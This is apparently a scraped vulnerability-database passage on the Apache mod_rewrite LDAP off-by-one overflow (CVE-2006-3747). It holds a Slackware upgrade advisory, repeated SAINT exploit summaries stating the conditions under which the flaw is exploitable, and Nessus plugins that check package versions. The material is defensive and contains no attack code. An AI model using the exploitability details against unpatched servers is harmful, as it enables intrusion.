apache-1.3.37-i486-1_slack10.0.tgz\ndc47b69b0609f94a68196d07c42d563f mod_ssl-2.8.28_1.3.37-i486-1_slack10.0.tgz\n\nSlackware 10.1 packages:\nd442b2fa446eb41592ad2b0b8f9bf836 apache-1.3.37-i486-1_slack10.1.tgz\nfc5dc2154b3d906a91745761a9511276 mod_ssl-2.8.28_1.3.37-i486-1_slack10.1.tgz\n\nSlackware 10.2 packages:\n289a0160cce32539318b6155e112905d apache-1.3.37-i486-1_slack10.2.tgz\nf115fb6e615f2688e182a7696b63f76e mod_ssl-2.8.28_1.3.37-i486-1_slack10.2.tgz\n\nSlackware -current packages:\n8031dea830403ed012b6cf12795dd219 apache-1.3.37-i486-1.tgz\nfb24b42306a8731b1fcce93c90f99ded mod_ssl-2.8.28_1.3.37-i486-1.tgz\n\n\nInstallation instructions:\n\nFirst, stop apache:\n\n > apachectl stop\n\nThen, upgrade the apache package:\n\n > upgradepkg apache-1.3.37-i486-1_slack10.2.tgz mod_ssl-2.8.28_1.3.37-i486-1_slack10.2.tgz\n\nFinally, restart apache:\n\n > apachectl start\n\nOr, if you use mod_ssl:\n\n > apachectl 
startssl", "modified": "2006-07-29T00:21:45", "published": "2006-07-29T00:21:45", "id": "SSA-2006-209-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.610131", "type": "slackware", "title": "[slackware-security] Apache httpd", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-06-04T23:19:39", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "description": "Added: 06/22/2007 \nCVE: [CVE-2006-3747](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3747>) \nBID: [19204](<http://www.securityfocus.com/bid/19204>) \nOSVDB: [27588](<http://www.osvdb.org/27588>) \n\n\n### Background\n\n[mod_rewrite](<http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html>) is an Apache module which allows rule-based modification of URL requests. \n\n### Problem\n\nAn off-by-one buffer overflow vulnerability in mod_rewrite allows command execution when the `escape_absolute_uri` function attempts to separate tokens within an LDAP URL. \n\n### Resolution\n\nUpgrade to [Apache HTTP Server](<http://httpd.apache.org/>) version 1.3.37, 2.0.59, or 2.2.3 or higher. \n\n### References\n\n<http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html> \n<http://www.kb.cert.org/vuls/id/395412> \n\n\n### Limitations\n\nExploit works on Apache HTTP Server 2.0.58. The vulnerability is exploitable only when a RewriteRule lets the user control the initial part of the rewritten URL and that rule carries none of the Forbidden [F], Gone [G], or \"noescape\" [NE] flags. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2007-06-22T00:00:00", "published": "2007-06-22T00:00:00", "id": "SAINT:386ECCECD3AA34FA1E84E6D3D2B71C7B", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/apache_rewrite_ldap", "title": "Apache mod_rewrite LDAP URL buffer overflow", "type": "saint", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:48", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "edition": 2, "description": "Added: 06/22/2007 \nCVE: [CVE-2006-3747](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3747>) \nBID: [19204](<http://www.securityfocus.com/bid/19204>) \nOSVDB: [27588](<http://www.osvdb.org/27588>) \n\n\n### Background\n\n[mod_rewrite](<http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html>) is an Apache module which allows rule-based modification of URL requests. \n\n### Problem\n\nAn off-by-one buffer overflow vulnerability in mod_rewrite allows command execution when the `escape_absolute_uri` function attempts to separate tokens within an LDAP URL. \n\n### Resolution\n\nUpgrade to [Apache HTTP Server](<http://httpd.apache.org/>) version 1.3.37, 2.0.59, or 2.2.3 or higher. \n\n### References\n\n<http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html> \n<http://www.kb.cert.org/vuls/id/395412> \n\n\n### Limitations\n\nExploit works on Apache HTTP Server 2.0.58. The vulnerability is exploitable only when a RewriteRule lets the user control the initial part of the rewritten URL and that rule carries none of the Forbidden [F], Gone [G], or \"noescape\" [NE] flags. 
\n\n### Platforms\n\nWindows \n \n\n", "modified": "2007-06-22T00:00:00", "published": "2007-06-22T00:00:00", "id": "SAINT:35A5AA91DCF68555669689272BFFD3E7", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/apache_rewrite_ldap", "type": "saint", "title": "Apache mod_rewrite LDAP URL buffer overflow", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "description": "Added: 06/22/2007 \nCVE: [CVE-2006-3747](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3747>) \nBID: [19204](<http://www.securityfocus.com/bid/19204>) \nOSVDB: [27588](<http://www.osvdb.org/27588>) \n\n\n### Background\n\n[mod_rewrite](<http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html>) is an Apache module which allows rule-based modification of URL requests. \n\n### Problem\n\nAn off-by-one buffer overflow vulnerability in mod_rewrite allows command execution when the `escape_absolute_uri` function attempts to separate tokens within an LDAP URL. \n\n### Resolution\n\nUpgrade to [Apache HTTP Server](<http://httpd.apache.org/>) version 1.3.37, 2.0.59, or 2.2.3 or higher. \n\n### References\n\n<http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html> \n<http://www.kb.cert.org/vuls/id/395412> \n\n\n### Limitations\n\nExploit works on Apache HTTP Server 2.0.58. The vulnerability is exploitable only when a RewriteRule lets the user control the initial part of the rewritten URL and that rule carries none of the Forbidden [F], Gone [G], or \"noescape\" [NE] flags. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2007-06-22T00:00:00", "published": "2007-06-22T00:00:00", "id": "SAINT:B572402CE6E5C851D7572BF044507A14", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/apache_rewrite_ldap", "type": "saint", "title": "Apache mod_rewrite LDAP URL buffer overflow", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-07T10:50:42", "description": "The Apache Software Foundation and The Apache HTTP Server Project\nreports :\n\nAn off-by-one flaw exists in the Rewrite module, mod_rewrite, as\nshipped with Apache 1.3 since 1.3.28, 2.0 since 2.0.46, and 2.2 since\n2.2.0.\n\nDepending on the manner in which Apache HTTP Server was compiled, this\nsoftware defect may result in a vulnerability which, in combination\nwith certain types of Rewrite rules in the web server configuration\nfiles, could be triggered remotely. For vulnerable builds, the nature\nof the vulnerability can be denial of service (crashing of web server\nprocesses) or potentially allow arbitrary code execution. This issue\nhas been rated as having important security impact by the Apache HTTP\nServer Security Team.\n\nThis flaw does not affect a default installation of Apache HTTP\nServer. Users who do not use, or have not enabled, the Rewrite module\nmod_rewrite are not affected by this issue. This issue only affects\ninstallations using a Rewrite rule with the following characteristics\n:\n\n- The RewriteRule allows the attacker to control the initial part of\nthe rewritten URL (for example if the substitution URL starts with $1)\n\n- The RewriteRule flags do NOT include any of the following flags:\nForbidden (F), Gone (G), or NoEscape (NE).\n\nPlease note that ability to exploit this issue is dependent on the\nstack layout for a particular compiled version of mod_rewrite. 
If the\ncompiler used to compile Apache HTTP Server has added padding to the\nstack immediately after the buffer being overwritten, it will not be\npossible to exploit this issue, and Apache HTTP Server will continue\noperating normally.\n\nThe Apache HTTP Server project thanks Mark Dowd of McAfee Avert Labs\nfor the responsible reporting of this vulnerability.", "edition": 25, "published": "2006-07-29T00:00:00", "title": "FreeBSD : apache -- mod_rewrite buffer overflow vulnerability (dc8c08c7-1e7c-11db-88cf-000c6ec775d9)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "modified": "2006-07-29T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apache+mod_ssl+ipv6", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_deflate", "p-cpe:/a:freebsd:freebsd:ru-apache", "p-cpe:/a:freebsd:freebsd:apache+mod_perl", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp+mod_deflate+ipv6", "p-cpe:/a:freebsd:freebsd:apache_fp", "p-cpe:/a:freebsd:freebsd:ru-apache+mod_ssl", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp+mod_accel+ipv6", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:apache+ipv6", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_accel+ipv6", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp+mod_accel", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_accel+mod_deflate+ipv6", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp+mod_accel+mod_deflate+ipv6", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp+mod_deflate", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_deflate+ipv6", "p-cpe:/a:freebsd:freebsd:apache+ssl", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_accel", "p-cpe:/a:freebsd:freebsd:apache", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_accel+mod_deflate"], "id": "FREEBSD_PKG_DC8C08C71E7C11DB88CF000C6EC775D9.NASL", "href": "https://www.tenable.com/plugins/nessus/22118", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, 
Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22118);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-3747\");\n script_xref(name:\"CERT\", value:\"395412\");\n\n script_name(english:\"FreeBSD : apache -- mod_rewrite buffer overflow vulnerability (dc8c08c7-1e7c-11db-88cf-000c6ec775d9)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Apache Software Foundation and The Apache HTTP Server Project\nreports :\n\nAn off-by-one flaw exists in the Rewrite module, mod_rewrite, as\nshipped with Apache 1.3 since 1.3.28, 2.0 since 2.0.46, and 2.2 since\n2.2.0.\n\nDepending on the manner in which Apache HTTP Server was compiled, this\nsoftware defect may result in a vulnerability which, in combination\nwith certain types of Rewrite rules in the web server configuration\nfiles, could be triggered remotely. For vulnerable builds, the nature\nof the vulnerability can be denial of service (crashing of web server\nprocesses) or potentially allow arbitrary code execution. 
This issue\nhas been rated as having important security impact by the Apache HTTP\nServer Security Team.\n\nThis flaw does not affect a default installation of Apache HTTP\nServer. Users who do not use, or have not enabled, the Rewrite module\nmod_rewrite are not affected by this issue. This issue only affects\ninstallations using a Rewrite rule with the following characteristics\n:\n\n- The RewriteRule allows the attacker to control the initial part of\nthe rewritten URL (for example if the substitution URL starts with $1)\n\n- The RewriteRule flags do NOT include any of the following flags:\nForbidden (F), Gone (G), or NoEscape (NE).\n\nPlease note that ability to exploit this issue is dependent on the\nstack layout for a particular compiled version of mod_rewrite. If the\ncompiler used to compile Apache HTTP Server has added padding to the\nstack immediately after the buffer being overwritten, it will not be\npossible to exploit this issue, and Apache HTTP Server will continue\noperating normally.\n\nThe Apache HTTP Server project thanks Mark Dowd of McAfee Avert Labs\nfor the responsible reporting of this vulnerability.\"\n );\n # http://marc.theaimsgroup.com/?l=apache-httpd-announce&m=115409818602955\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=apache-httpd-announce&m=115409818602955\"\n );\n # https://vuxml.freebsd.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3cac6d85\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", 
value:'Apache Module mod_rewrite LDAP Protocol Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_accel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_accel+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_accel+mod_deflate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_accel+mod_deflate+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_deflate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_deflate+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp+mod_accel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp+mod_accel+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp+mod_accel+mod_deflate+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp+mod_deflate\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp+mod_deflate+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache_fp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ru-apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ru-apache+mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache>=1.3.28<1.3.36_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache>=2.0.46<2.0.58_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache>=2.2.0<2.2.2_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_perl>=1.3.28<1.3.36_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+ipv6>=1.3.28<1.3.37\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache_fp>=0\")) flag++;\nif 
(pkg_test(save_report:TRUE, pkg:\"ru-apache>=1.3.28<1.3.37+30.23\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ru-apache+mod_ssl>=1.3.28<1.3.34.1.57_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+ssl>=1.3.28<1.3.34.1.57_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+ipv6>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_accel>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_accel+ipv6>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_accel+mod_deflate>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_accel+mod_deflate+ipv6>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_deflate>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_deflate+ipv6>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_snmp>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_snmp+mod_accel>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_snmp+mod_accel+ipv6>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_snmp+mod_deflate>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_snmp+mod_deflate+ipv6>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_snmp+mod_accel+mod_deflate+ipv6>=1.3.28<1.3.36+2.8.27_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2021-01-06T09:44:40", "description": "Mark Dowd discovered a buffer overflow in the mod_rewrite component of\napache, a versatile high-performance HTTP server. In some situations a\nremote attacker could exploit this to execute arbitrary code.", "edition": 26, "published": "2006-10-14T00:00:00", "title": "Debian DSA-1131-1 : apache - buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "modified": "2006-10-14T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.1", "p-cpe:/a:debian:debian_linux:apache"], "id": "DEBIAN_DSA-1131.NASL", "href": "https://www.tenable.com/plugins/nessus/22673", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1131. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22673);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-3747\");\n script_xref(name:\"CERT\", value:\"395412\");\n script_xref(name:\"DSA\", value:\"1131\");\n\n script_name(english:\"Debian DSA-1131-1 : apache - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mark Dowd discovered a buffer overflow in the mod_rewrite component of\napache, a versatile high-performance HTTP server. 
In some situations a\nremote attacker could exploit this to execute arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=380231\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1131\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the apache package.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 1.3.33-6sarge2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Module mod_rewrite LDAP Protocol Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/07/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"apache\", reference:\"1.3.33-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache-common\", reference:\"1.3.33-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache-dbg\", reference:\"1.3.33-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache-dev\", reference:\"1.3.33-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache-doc\", reference:\"1.3.33-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache-perl\", reference:\"1.3.33-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache-ssl\", reference:\"1.3.33-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache-utils\", reference:\"1.3.33-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libapache-mod-perl\", reference:\"1.29.0.3-6sarge2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:43:08", "description": "This update fixes the following security problem in the Apache\nwebserver :\n\nmod_rewrite: Fix an off-by-one security problem in the ldap scheme\nhandling. For some RewriteRules this could lead to a pointer being\nwritten out of bounds. 
(CVE-2006-3747)", "edition": 24, "published": "2007-10-17T00:00:00", "title": "openSUSE 10 Security Update : apache2 (apache2-1905)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "modified": "2007-10-17T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2-worker", "p-cpe:/a:novell:opensuse:apache2-prefork", "cpe:/o:novell:opensuse:10.1", "p-cpe:/a:novell:opensuse:apache2"], "id": "SUSE_APACHE2-1905.NASL", "href": "https://www.tenable.com/plugins/nessus/27145", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-1905.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27145);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-3747\");\n\n script_name(english:\"openSUSE 10 Security Update : apache2 (apache2-1905)\");\n script_summary(english:\"Check for the apache2-1905 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the following security problem in the Apache\nwebserver :\n\nmod_rewrite: Fix an off-by-one security problem in the ldap scheme\nhandling. For some RewriteRules this could lead to a pointer being\nwritten out of bounds. 
(CVE-2006-3747)\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Module mod_rewrite LDAP Protocol Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", 